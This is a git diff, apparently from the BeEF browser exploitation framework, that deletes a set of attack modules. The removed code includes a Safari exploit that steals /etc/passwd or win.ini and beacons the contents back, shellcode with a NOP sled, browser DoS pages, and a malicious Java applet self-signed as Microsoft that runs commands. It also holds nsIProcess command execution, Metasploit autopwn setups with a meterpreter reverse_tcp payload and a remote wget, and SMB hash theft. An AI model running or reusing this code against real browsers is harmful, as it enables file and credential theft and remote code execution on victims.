ar.enable('CVE-2009-0137', get_b64_code_2009_0137());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2009_0137());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2009-0137</div>
This Safari exploit module will steal a file from the file system. On Windows
the 'c:\windows\win.ini' will be stolen and on a Mac the '/etc/passwd' will
be stolen.<br><br>
The results will be displayed in the log. <br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/cve_2009_0137/name.txt
View File

@@ -1 +0,0 @@
Safari File Theft (CVE-2009-0137)

20
modules/browser/cve_2009_0137/snatchxml.php
View File

@@ -1,20 +0,0 @@
<?php
// Copyright (c) 2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php");
?>
beef_url = "<?php echo BEEF_DOMAIN; ?>";
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?BeEFSession=<?php echo session_id(); ?>&action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}
return_result(result_id, file_content);

11
modules/browser/cve_2009_0137/template.js
View File

@@ -1,11 +0,0 @@
function do_main(){
var iframe = document.createElement('iframe');
// pass result_id in the url
iframe.src = beef_url + 'modules/symmetric/xplt_cve_2009_0137/xss-max.xml' + '#' + result_id;
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
}
do_main();

66
modules/browser/cve_2009_0137/xss-max.xml
View File

@@ -1,66 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
>
<channel>
<title>Local XSS</title>
<link>http://www.bindshell.net</link>
<description>BeEF Browser Exploitation Framework</description>
<item>
<title>BeEF module</title>
<content:encoded><![CDATA[
<body src="/beef/images/beef.gif" onload="javascript:;
var req;
var req_file;
if (/Windows/.test(navigator.userAgent)) {
req_file='file:///c:/windows/win.ini'
} else {
req_file='file:////etc/passwd'
};
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open('GET', req_file, true);
req.send('');
function processReqChange() {
if (req.readyState == 4) {
file_content = req.responseText;
result_id=document.location.hash.substr(1,document.cookie.length);
beef_url = 'http://' + document.location.host + '/beef/';
var html_doc = document.getElementsByTagName('head').item(0);
var js = document.createElement('script');
js.src = beef_url + 'modules/browser/xplt_cve_2009_0137/snatchxml.php';
js.type = 'text/javascript';
html_doc.appendChild(js);
}
}" <onload=""
]]>
</content:encoded>
</item>
<title>Local XSS</title>
<link>http://www.bindshell.net</link>
<description>none</description>
<item>
<title>RSS sploit</title>
<content:encoded><![CDATA[
]]>
</content:encoded>
</item>
</channel>
</rss>

71
modules/browser/dos_chrome/index.php
View File

@@ -1,71 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: http://www.milw0rm.com/exploits/8573
BeEF: http://www.secniche.org/gthr.html
BeEF: the following is the boiler plate from the exploit
Advisory: Google Chrome 1.0.154.59 "throw exception" Memory Exhaustion Vulnerability.
Version Affected:
1.0.154.59 . Previous versions are vulnerable too
Description:
The Google chrome browser is vulnerable to memory exhaustion based denial of service which can be triggered remotely.The vulnerability is a result of arbitrary shell code which is rendered in a script tag with an exception that is raised directly with throw statement. It makes the browser to consume memory thereby impacting the focussed window and leads to crash. The impact can be stringent based on different systems.
Proof of Concept:
http://www.secniche.org/gthr
Detection:
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are:1.0.154.59
Disclosure Timeline:
Release Date. April 28 ,2009
Credit:
Aditya K Sood
-->
<script>
function get_b64_code_cd() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Dos Chrome', get_b64_code_cd());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_cd());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Chrome "throw exception" Memory Exhaustion</div>
Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service <br>
Executing NOP Sled and Shellcode to create an Exception.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/dos_chrome/name.txt
View File

@@ -1 +0,0 @@
DoS Chrome

6
modules/browser/dos_chrome/template.js
View File

@@ -1,6 +0,0 @@
var nop_sled=unescape("%u9090");
var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
for(var i=0;i<64;i++){
nop_sled=nop_sled+nop_sled;
document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>');
}

7
modules/browser/dos_firefox/ffkeygendos.html
View File

@@ -1,7 +0,0 @@
<html>
<body onLoad="document.forms[0].submit()">
<FORM>
<KEYGEN NAME="somekey" CHALLENGE="1125983021">
<INPUT TYPE="submit" NAME="SubmitButton" VALUE="Done">
</FORM>
</html>

46
modules/browser/dos_firefox/index.php
View File

@@ -1,46 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: this exploit was downloaded from milworm
http://www.milw0rm.com/exploits/8822
-->
<script>
function get_b64_code_fd() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('DoS Firefox', get_b64_code_fd());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_fd());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Firefox (Keygen)</div>
This will DoS firefox and give very limited interaction. A dialog will be displayed repeatedly.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/dos_firefox/name.txt
View File

@@ -1 +0,0 @@
DoS Firefox (Keygen)

12
modules/browser/dos_firefox/template.js
View File

@@ -1,12 +0,0 @@
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/symmetric/xplt_firefox_dos/ffkeygendos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
return_result(result_id, do_main());

4
modules/browser/dos_generic/browserdos.html
View File

File diff suppressed because one or more lines are too long

43
modules/browser/dos_generic/index.php
View File

@@ -1,43 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once ("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "This shouldn't be returned'";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('DoS Generic', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Generic</div>
This will DoS many browsers. A large string will be repeatedly
written using the JavaScript function document.writeln(). <br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/dos_generic/name.txt
View File

@@ -1 +0,0 @@
DoS Generic

15
modules/browser/dos_generic/template.js
View File

@@ -1,15 +0,0 @@
// thanks pipes (mark@freedomisnothingtofear.com)
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/browser/generic_dos/browserdos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Executing now";
}
return_result(result_id, do_main());

BIN
modules/browser/malicious_applet/SignedUpdate.jar
View File

Binary file not shown.

52
modules/browser/malicious_applet/index.php
View File

@@ -1,52 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// Module by: Joshua "Jabra" Abraham http://blog.spl0it.org
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_applet() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
// do some super escaping
cmd_str = document.myform.cmd.value;
cmd_str = cmd_str.replace(/\\/g, '\\\\');
cmd_str = cmd_str.replace(/\\/g, '\\\\');
// replace sections of the code with user input
b64code = b64replace(b64code, "BEEFCMD_IE",cmd_str);
b64code = b64replace(b64code, "BEEFCMD",cmd_str);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Malicious Applet', get_b64_code_applet());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_applet());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Malicious Java Applet</div>
This module will execute a command on the client. The client will receive a Java Applet popup. <br><br>
The certificate is self-signed by the Microsoft Corporation.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Command</div>
<input type="text" name="cmd" value="c:\windows\system32\calc.exe"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/malicious_applet/name.txt
View File

@@ -1 +0,0 @@
Malicious Java Applet

30
modules/browser/malicious_applet/template.js
View File

@@ -1,30 +0,0 @@
// ie doesn't play nice with dynamic loading of jars - below is a link to what sun recommends
// if any knows a nicer way to do this drop me an email
// http://java.sun.com/javase/6/docs/technotes/guides/plugin/developer_guide/using_tags.html#javascript
function applet() {
var _app = navigator.appName;
if (_app == 'Microsoft Internet Explorer') {
var malicious = document.createElement("div");
malicious.innerHTML = '<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"> <PARAM name="codebase" value="../modules/standard/malicious_applet"> <PARAM name="code" value="Update">> <PARAM name="archive" value="SignedUpdate.jar">> <PARAM name="cmd" value="BEEFCMD_IE"> </OBJECT>';
document.body.appendChild(malicious);
} else {
document.write(
'<embed ',
'code="Update"',
'codebase="../modules/browser/malicious_applet/"',
'archive="SignedUpdate.jar"',
'cmd="BEEFCMD"',
'width="0"',
'height="0"',
'type="application/x-java-applet;version=1.6" />');
}
return_result(result_id, "Appet running");
}
applet();

53
modules/browser/mozilla_nsiprocess_interface/index.php
View File

@@ -1,53 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_alert = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "BEEFCOMMAND", document.myform.command_str.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_alert());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_alert());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Mozilla nsIProcess XPCOM Interface (Windows)</div>
The nsIProcess XPCOM interface represents an executable process. JavaScript
code with chrome privileges can use the nsIProcess interface to launch
executable files. In this module, nsIProcess is combined with the Windows
command prompt cmd.exe.
<br><br>
Any XSS injection in a chrome privileged zone (e.g. typically in Firefox
extensions) allows his module to execute arbitrary commands on the victim
machine.
<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Windows Command</div>
<input type="text" width="90%" name="command_str" value="ping localhost"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/mozilla_nsiprocess_interface/name.txt
View File

@@ -1 +0,0 @@
Mozilla nsIProcess Interface

17
modules/browser/mozilla_nsiprocess_interface/template.js
View File

@@ -1,17 +0,0 @@
// thanks Roberto (roberto.suggi@security-assessment.com) and Nick (nick.freeman@security-assessment.com)
function do_main(){
var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
var lPath = "C:\\WINDOWS\\system32\\cmd.exe";
lFile.initWithPath(lPath);
var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(lFile);
process.run(false,['/c', 'BEEFCOMMAND'],2);
}
do_main();
return_result(result_id, "command executed");

61
modules/browser/msf_autopwn/index.php
View File

@@ -1,61 +0,0 @@
<?php
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Browser Autopwn</div>
This module creates a Metasploit listener using a backend server, and then sends the client
code which creates an iframe connecting to the waiting exploit.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">LHOST (Required)</div>
<input type="text" name="LHOST" value="0.0.0.0"/>
<div id="module_subsection_header">LPORT</div>
<input type="text" name="LPORT" value="4444"/>
<div id="module_subsection_header">SRVHOST (Required)</div>
<input type="text" name="SRVHOST" value="0.0.0.0"/>
<div id="module_subsection_header">SRVPORT (Required)</div>
<input type="text" name="SRVPORT" value="8080"/>
<div id="module_subsection_header">URIPATH</div>
<input type="text" name="URIPATH" value="beef"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_browser_autopwn()"/>
</form>
</div>

1
modules/browser/msf_autopwn/name.txt
View File

@@ -1 +0,0 @@
MSF Browser Autopwn

14
modules/browser/msf_autopwn/template.js
View File

@@ -1,14 +0,0 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Browser AutoPWN";
}
return_result(result_id, do_main());

9
modules/browser/msf_autopwn_manual/beef.rc
View File

@@ -1,9 +0,0 @@
use auxiliary/server/browser_autopwn
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 53
set SRVPORT 9000
set URIPATH /beef.html
sh -c 'cd /tmp; wget http://spl0it.org/files/msfautopwn.rb'
set AutoRunScript /tmp/msfautopwn.rb
run

59
modules/browser/msf_autopwn_manual/index.php
View File

@@ -1,59 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
//
// Module by: Joshua "Jabra" Abraham
// jabra@spl0it.org
// http://blog.spl0it.org
//
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "Request Received";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "MSF_IP",document.myform.msf_ip.value);
b64code = b64replace(b64code, "MSF_PORT",document.myform.msf_port.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Metasploit Browser Autopwn (Manual Setup)</div>
<div class="entry">
This exploit requires an RC file for Metasploit. Unlike the other Metasploit modules,
this one requires the manual setup of the autopwn module.<br><br>
Metasploit Autopwn RC File:<a href="../modules/browser/msf_autopwn/beef.rc"> beef.rc </a><br>
<pre>
sudo ./msfconsole -r beef.rc
</pre>
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Metasploit Autopwn IP</div>
<input type="text" name="msf_ip" value="10.0.0.100"/>
<div id="module_subsection_header">Metasploit Autopwn Port</div>
<input type="text" name="msf_port" value="9000"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/><br>
</form>
</div>

1
modules/browser/msf_autopwn_manual/name.txt
View File

@@ -1 +0,0 @@
MSF Browser Autopwn (M)

17
modules/browser/msf_autopwn_manual/template.js
View File

@@ -1,17 +0,0 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'http://MSF_IP:MSF_PORT/beef.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
var result_value = do_main();
return_result(result_id, result_value);

68
modules/browser/msf_browser_expliot/index.php
View File

@@ -1,68 +0,0 @@
<?php
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Browser Exploits</div>
This module creates a Metasploit listener using a backend server, and then sends the client
code which creates an iframe connecting to the waiting exploit.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">Exploit</div>
<div id="exploits">
<select name="" id="loading" onChange="">
<option value="">Loading...</option>
</select>
</div>
<div id="module_subsection_header">Payload</div>
<div id="payloads">
<select name="" id="loading" onChange="">
<option value="">Loading...</option>
</select>
</div>
<div id="options">Loading...</div>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_execute_module()"/>
</form>
</div>
<script>
// init pane
msf_get_exploit_list();
</script>

1
modules/browser/msf_browser_expliot/name.txt
View File

@@ -1 +0,0 @@
MSF Browser Exploit

14
modules/browser/msf_browser_expliot/template.js
View File

@@ -1,14 +0,0 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Metasploit Module";
}
return_result(result_id, do_main());

65
modules/browser/msf_capture_hashes/index.php
View File

@@ -1,65 +0,0 @@
<?php
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit SMB Challenge Theft</div>
This module launches a Metasploit listener that attempts to covertly steal SMB Challenge hashes. Once
the Metasploit module has been launched, the targeted zombies will be redirected to Metasploit to attempt
to capture credentials.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">SRVHOST (Required)</div>
<input type="text" name="SRVHOST" value="0.0.0.0"/>
<div id="module_subsection_header">SRVPORT (Required)</div>
<input type="text" name="SRVPORT" value="8080"/>
<div id="module_subsection_header">URIPATH</div>
<input type="text" name="URIPATH" value="beef"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_smb_challenge_capture()"/><br>
</form>
<div class="entry">
<br>
After a successful exploitation the results can be found:<br>
<a href=../cache/logfile>Captured hashes</a><br>
<a href=../cache/pwfile>Captured hashes (Cain &amp; Able format)</a>
</div>
</div>

1
modules/browser/msf_capture_hashes/name.txt
View File

@@ -1 +0,0 @@
MSF SMB Challenge Theft

14
modules/browser/msf_capture_hashes/template.js
View File

@@ -1,14 +0,0 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Metasploit SMB Credential Theft";
}
return_result(result_id, do_main());

BIN
modules/browser/msf_malicious_java_applet/SignedUpdate.jar
View File

Binary file not shown.

Some files were not shown because too many files have changed in this diff Show More